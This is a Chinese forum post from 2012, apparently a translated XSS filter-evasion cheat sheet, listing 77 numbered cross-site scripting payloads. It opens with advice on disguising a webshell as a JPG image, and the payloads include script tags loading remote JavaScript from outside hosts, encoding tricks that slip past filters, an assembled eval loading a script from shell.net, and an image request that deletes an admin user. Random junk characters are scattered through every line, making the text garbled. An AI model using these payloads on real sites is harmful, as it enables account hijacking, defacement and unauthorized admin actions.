跨站图片shell0 o6 w" n8 _" V b2 H( b. N
XSS跨站代码 <script>alert("")</script>
- b1 Q: Y, |! k) i, J
8 M6 P# l( e* T# h将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马3 Q8 e& P5 ~9 N! l
! r4 X* ~- e r2 y$ Y1 I. m: ?/ p
3 V* K' H, O0 m) p! E& O3 Z7 ~3 }' N
! Y# j( h: ^4 M6 K1)普通的XSS JavaScript注入$ l1 s/ v# a0 o: V( Z/ @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 f" G! D' D7 w' h& |
2 ~; f6 M. t y3 M8 O; u(2)IMG标签XSS使用JavaScript命令- |8 {) z8 X/ M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. P- s- r. y) L, s( G$ f
$ K4 {# N5 y" r3 V7 M; F' A(3)IMG标签无分号无引号
" D1 D0 J% s" Z& s<IMG SRC=javascript:alert(‘XSS’)>
9 N+ a# E) a% [/ i) Y, t; a2 b c- \' p/ P6 B! [
(4)IMG标签大小写不敏感/ \7 j- O& M2 P5 E. M" z, G
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>* C! U- f3 S, v; R3 l- S
+ j( q; T* v( R
(5)HTML编码(必须有分号)! Q ^) G: M J7 t* Y T, [
<IMG SRC=javascript:alert(“XSS”)>2 N5 f! \/ l, J T$ Y
: W) @: o- {: P7 d
(6)修正缺陷IMG标签
0 y3 Q# @2 y7 V<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> v- ^; s! d) h0 L" \ a p
1 z2 X$ I7 S' Q; H% q(7)formCharCode标签(计算器)
( \4 J8 w9 y* \; a, f! r<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, S' B# `8 p. J
5 [+ ?+ F" P' p# k- r7 Q(8)UTF-8的Unicode编码(计算器)
* f0 C, a& G+ N( d/ @% _- W<IMG SRC=jav..省略..S')>
$ U4 P+ ^1 b" N7 P/ X) @1 w
: o$ x9 x( c6 |, ?(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- m6 W. h6 W( {4 m% P
<IMG SRC=jav..省略..S')>
- n( B G5 L1 d+ p/ i; i$ d" ~: j5 P' q6 k* X1 k" G! s! U
(10)十六进制编码也是没有分号(计算器)8 d/ @/ u5 h8 a) U/ c8 X
<IMG SRC=java..省略..XSS')>1 I, b- H0 ?7 F7 Z* T z. z
2 ?$ ]$ d) `* k6 R. l8 f
(11)嵌入式标签,将Javascript分开
/ W( y" z# I* Z8 B H<IMG SRC=”jav ascript:alert(‘XSS’);”>' [+ j& \$ _! V5 B Y9 y
* {" j5 l/ f2 G# l C; Q
(12)嵌入式编码标签,将Javascript分开
6 B; ^: {" r4 _/ p/ C<IMG SRC=”jav ascript:alert(‘XSS’);”>5 |' S5 n, P/ U: ~" d+ f8 {
, b3 A. [4 p/ X, C! _5 Z) T(13)嵌入式换行符0 {0 [) Y, a4 r7 b
<IMG SRC=”jav ascript:alert(‘XSS’);”>* X! L' H. J" ^3 Q$ l
2 ?! C, X# y" e' Z(14)嵌入式回车
. i2 F2 h9 b1 |6 C<IMG SRC=”jav ascript:alert(‘XSS’);”>
; I/ G8 B7 B+ Y7 t: v1 }) B( T8 U3 R4 I+ X1 i
(15)嵌入式多行注入JavaScript,这是XSS极端的例子 _0 u2 |; ?/ j7 p O/ ]
<IMG SRC=”javascript:alert(‘XSS‘)”>! ~7 K, n4 ~- R! Q
+ O! A$ c& l4 ~1 C& a(16)解决限制字符(要求同页面)+ C6 d/ h T4 r
<script>z=’document.’</script>% L' G7 D' N5 p0 |
<script>z=z+’write(“‘</script>
# q4 X ?; | q. ~' S; @6 K<script>z=z+’<script’</script>
4 t% d! }5 n/ j5 s<script>z=z+’ src=ht’</script>
x, y1 M3 p) j<script>z=z+’tp://ww’</script>: o4 _2 E5 n# ~* f! k: ]" I
<script>z=z+’w.shell’</script>
* ?7 M$ p/ G4 O+ }; ~5 }<script>z=z+’.net/1.’</script>
' L, l4 x- A. W- ^% E<script>z=z+’js></sc’</script>, x8 N, \7 |5 s, m' p
<script>z=z+’ript>”)’</script>
% y* e+ ?5 \' _: A6 ?% K4 R<script>eval_r(z)</script>/ g) W) c! z: O7 [0 v
( `7 c7 o: M* U/ J& p(17)空字符4 g3 x8 G! Q$ m2 E! I9 m; C& Y! `
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& S" ?' i! F+ G" B; _
! u# J6 ~6 {" y- E(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用/ t1 m* R" P1 F8 s6 E' a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. q8 S3 ~$ I9 M& W
& Q) x# t5 c0 m, q9 J0 k
(19)Spaces和meta前的IMG标签
3 k3 V& H2 r' Q& u3 a<IMG SRC=” javascript:alert(‘XSS’);”>+ J$ o5 R6 T* H) y6 e3 r0 P
& L% z; L$ A; ^: E S0 Y# g
(20)Non-alpha-non-digit XSS
0 f- }: m' u) @ v<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- j& h# C4 O8 H5 f$ X5 ~+ r" J
t% B! A( o( N( P3 N. M) ]# f
(21)Non-alpha-non-digit XSS to 2
! A" ~7 f2 v! w( r, c<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- Z/ P9 X- _0 }0 i6 H* @# k; o1 p4 ~" W
(22)Non-alpha-non-digit XSS to 3
6 r4 }3 [( ~% G3 y2 l- f# O<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% V0 B& r% z- p3 @* S7 f% @7 U
Q i- L6 D, W& [% F( |! R) v(23)双开括号2 H9 {( H4 b+ o- F& i9 v5 J' q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
- P1 Y. E% W# L) W B8 i3 y1 l
0 ~. m6 m$ o; P0 S(24)无结束脚本标记(仅火狐等浏览器)
- `5 T& T$ q0 A; c: p' I<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 e# o8 S! e6 _" m- B8 R' {2 Y/ d- q, M
+ m) v+ T9 e7 ?8 N+ H" J. \
(25)无结束脚本标记2# u B ~. R/ w0 s7 Z3 u8 J
<SCRIPT SRC=//3w.org/XSS/xss.js>
9 J M( c# P9 [5 w- }5 M$ s
" R' S2 T. o% p x! `6 n. E3 p(26)半开的HTML/JavaScript XSS9 w& ~, F8 B1 I$ k7 ^
<IMG SRC=”javascript:alert(‘XSS’)”+ J/ G& r- t4 C0 E0 M: A0 x/ n
! z/ P3 d8 N4 f! @4 r$ f, c- j
(27)双开角括号
# M, g+ Z4 n2 Z4 N<iframe src=http://3w.org/XSS.html <- o, q+ @4 R% M! a" g4 ^
/ W0 I7 u& J2 H$ ]/ t
(28)无单引号 双引号 分号
o$ n, r6 \; F6 j2 K; `4 V<SCRIPT>a=/XSS/6 s8 G9 ?6 Z- h
alert(a.source)</SCRIPT>4 q& x+ A# s" q+ F% [5 J
* s2 K* @4 P3 O! [$ k9 o(29)换码过滤的JavaScript
. Q5 T; \! _3 ?# n0 E0 v\”;alert(‘XSS’);//
& Y% Z( f( }6 v/ H
! {7 P0 l: s; G) L(30)结束Title标签" M/ G' E4 X+ f( K: `$ F/ o
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 v& w0 ^0 y/ m; F0 A
& s! j% G. I& G8 J+ z2 U, C" A(31)Input Image
; [ c0 n. N: r% A<INPUT SRC=”javascript:alert(‘XSS’);”># A z1 d6 F: y# e/ D! s! k( {
& G @4 y. T1 F- l( G0 r(32)BODY Image( a/ H- z! w8 [. y0 m6 e
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 D8 N/ i! \- G) ?
# Q3 D" T: M5 a; `! M3 M! v(33)BODY标签$ r/ V* e; u. O& r$ [: O
<BODY(‘XSS’)>
" C8 F; X6 E( \9 d" y/ o i6 ]1 p1 R3 Y' h; P
(34)IMG Dynsrc; F3 F* H: A& B' ~( E2 k H; r0 ~. z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 C" ^9 E1 }# R( |$ G$ ^* ]9 X
" q; [5 X3 e. l( o. Q7 g7 M
(35)IMG Lowsrc, B( {, c! q5 f3 \6 r
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
3 U3 e5 V: d0 s8 n O5 X* w; o ~- n/ N' y1 P" |
(36)BGSOUND
8 j2 A. `9 p& |4 a' [" D; e; w<BGSOUND SRC=”javascript:alert(‘XSS’);”>9 F' `% [! G$ O+ a& z, u) t
$ k- r3 j& j$ y; C) R% [
(37)STYLE sheet# ^( k" _# m6 p: S" `
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) @, m7 g8 X7 @5 Q, ^6 k1 }0 q& H1 q4 Z& c
(38)远程样式表+ }. }2 c: b6 t! }
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. G) ~0 g7 B7 m! R
1 U' l5 d7 A& f0 a( h6 I+ Y" j(39)List-style-image(列表式)
5 S6 N2 r2 f0 w* u! L<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
' ~# O- l i7 m5 I* t% z8 k
- G: z8 W% p! f& w(40)IMG VBscript
% w( h, c, X! }/ N<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& @0 j) s3 {/ G8 R! D+ }- \; b9 I5 H" b9 M
(41)META链接url
, U9 w$ ^6 l4 }' U7 ]$ o<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”># L& r% n, `- }& I
9 e9 L, } L j i9 v% q
(42)Iframe
+ ~2 \1 k; O g, l* s1 ?0 }% p9 ^' T( S. m<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- \5 e/ z( t% e5 P" p/ E(43)Frame
4 h6 D% I$ ?+ n/ \, `! P<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
% ~' t: i( N4 E K* q/ J: A0 Y8 C. `0 Y# N. C$ _8 |. l' A6 c0 U
(44)Table. @" h4 Z$ F* M% u0 g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>7 |) w7 {; [$ ]" x7 r9 a( t
3 m+ Z G# H3 }, m6 U/ U
(45)TD
# g+ V, @( |1 J( A- [( J( ?<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>7 ~$ e, |9 r5 q# K
3 J. J. C7 p/ l: ?+ J, E1 O& P$ \
(46)DIV background-image/ f4 }/ T% z) v) N" d( l; \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" C7 g/ ?9 I, B4 H. \9 }
: U4 T5 m& ^; l+ j(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 |2 b$ V8 R, |8 U( p& @+ Y
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>/ j" @ L6 a3 Z3 z+ ?8 h, T
# e5 w+ a- _# d(48)DIV expression
+ _1 B4 o& y4 B% `" C( q<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 P& T7 L6 r9 q6 G( x( K
% ~( Z5 K* n0 [. H: s2 w
(49)STYLE属性分拆表达" E: k \) ^. C: }* p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ X) g j* g! R+ R. O4 i7 A1 O+ N f/ o4 q" z
(50)匿名STYLE(组成:开角号和一个字母开头)/ z6 S. R" t: k! O
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: |: t7 l+ C# d- f: B3 O' L
# P: r% Y$ ]2 `+ g+ l, x' d$ D" Y s(51)STYLE background-image# }( g' q4 j+ r2 H
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
$ G# V$ F& A4 h1 s9 \; z' _5 B6 e
& O5 E9 i' F: k. ?( `* m(52)IMG STYLE方式2 |! ^. C" S! j/ w/ d, K5 M
exppression(alert(“XSS”))’>
* m2 Y3 j: W+ M% V5 B
8 f7 z5 o+ I6 t A(53)STYLE background
& J' O: D2 u* i! @8 O( N0 N- D+ z<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 M) {: W* R) D- e i1 ]5 [( i
, Q: U2 f3 w4 w3 C* j(54)BASE
) H/ x: T( Y, x' E1 I* ~3 T<BASE HREF=”javascript:alert(‘XSS’);//”>
$ R2 N7 s* u( b: }5 @/ G
3 W8 x7 Z7 N9 P" \/ V& H) M2 m- G0 m(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
; R3 v, r6 n3 n0 J<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 q' c* e2 T: d8 d, x3 {% _8 M( L+ K/ ?% I. y4 u7 J' c
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 O4 `' Q/ S5 J* N' ~6 K* Ia=”get”;: ~* w: g; s5 M
b=”URL(\”";
h1 w( ^; \2 m' f$ _c=”javascript:”;" E! o$ g5 m7 p. z' `3 v
d=”alert(‘XSS’);\”)”;2 R- E# C6 h7 ?: A4 u' |
eval_r(a+b+c+d);
7 A& I. `" q# E
; O4 c& d3 }& y% a(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: L# N, P" H$ Y) Q, h% H
<HTML xmlns:xss>0 q( ?6 u0 Q; b8 J# Q& ~4 W
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# V G% S: E$ L8 e: h<xss:xss>XSS</xss:xss>7 G7 B3 A4 e7 @# p2 }: f# O) M! C
</HTML>
# Y7 q* }1 ?0 K5 ~5 `( \/ I2 E) j5 W0 e/ ?/ V3 v8 \
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" _3 l3 I' Q. T% q: W- f<SCRIPT SRC=””></SCRIPT>0 Z3 h9 h I; W1 K
, n* C: w1 Y+ v# V(59)IMG嵌入式命令,可执行任意命令2 J8 p9 M" B4 l, s; M5 ^. ~ Q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>8 O. `- g/ G! X* R# c& P8 k2 b
* f* g; I, y+ a* W# E% r# L(60)IMG嵌入式命令(a.jpg在同服务器)6 J8 y/ n7 a0 g) x3 R8 P
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; a. y6 j$ Z6 F7 I( y S! Z3 c; w; ?" V$ T/ m7 @. a# }: P
(61)绕符号过滤
' ]5 ?9 U6 D& {6 m<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 i, D' `2 ]$ l& M* W( x
8 X) s/ ~9 f0 L0 R* \(62)2 m. z( I" k: i
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: \/ W& g4 S3 s4 P( {6 M- _. h B
" W8 O5 J' X# L# ~( m: x, s/ n% Q# C(63)1 l$ k$ K% t: b: F) k# p
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 i0 t7 K. L! g$ s4 J: I5 A7 ?! U. i3 m0 N2 M {
(64)8 D$ e5 {7 E7 f6 D2 Y" L: m7 w
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* m {! B. e0 U# Y9 C" C
2 e, @6 u; {# k& J9 q" {3 g% u
(65)
$ X" E$ H; |* l; H# v, V5 I1 w<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
- K; G& L: j5 b" O4 h' B E6 K. F- M0 |+ m$ {
(66)
" n& R u6 x4 x Z<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
! z; ^( B2 P" l/ [6 U" s- l! o5 z: g, ^7 F6 W+ {* L
(67)
/ V1 V! [0 s; L7 m) S7 j* \+ X<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT># g1 o) n( f4 g. V; J
! c& R& x. r- `
(68)URL绕行
* z; i9 a) }! U$ S<A HREF=”http://127.0.0.1/”>XSS</A>
4 S: x9 U7 O) J' p' t( z" A9 A6 I% ~: \6 ]7 n
(69)URL编码# X F( v0 i# ]+ ]4 b
<A HREF=”http://3w.org”>XSS</A>5 F1 n' ]6 e3 r2 U) f3 o) g1 {
. Y- g* ]; T1 p" f3 R6 {
(70)IP十进制9 S% ~. e* k8 @6 T) w ~* V* B; \
<A HREF=”http://3232235521″>XSS</A>' a4 C7 [# F" F; a; J6 o( [6 ]
% H1 o& m$ b* P: L% ]# ^- r1 G6 F
(71)IP十六进制
8 I3 ~' Q2 M3 m4 e3 k% k ?4 \<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! C! Y" S; X6 A" N- C6 P
9 C$ s) s% q- c/ J$ \
(72)IP八进制& A# t3 V- B8 |+ a6 g K8 C C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>+ ?" c W/ u0 p5 ~" s4 ^' n
) L) B4 M4 W7 B; N- W1 H(73)混合编码
& H0 V m- Y& z1 j/ N) \<A HREF=”h' R$ C: Z7 e) C; D- E
tt p://6 6.000146.0×7.147/”">XSS</A>
8 P+ ~! V, ^! x! ^) x& q8 v2 o9 U3 H6 s
(74)节省[http:]- J5 J( ]6 G! c
<A HREF=”//www.google.com/”>XSS</A>1 h5 d4 R# [" i. ~8 g
h/ U& n" T; c3 p4 N8 Q(75)节省[www]' {3 Z# d4 d1 p) L( b5 I6 Z: d
<A HREF=”http://google.com/”>XSS</A>+ r; V) }1 ]1 f+ }0 ` K: g+ C
- N3 E" T- d x d(76)绝对点绝对DNS8 t5 g& S. C$ J
<A HREF=”http://www.google.com./”>XSS</A>
* p H' b1 m% G. S6 I. L9 ^+ p/ K7 W
V( `' R' l- r6 Y: Z8 s- A6 u& }7 U(77)javascript链接 |# |8 s$ H& s5 b
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
: W: e2 g+ B1 n; b2 i |
发表于 2012-9-13 17:04:56
收藏
支持
反对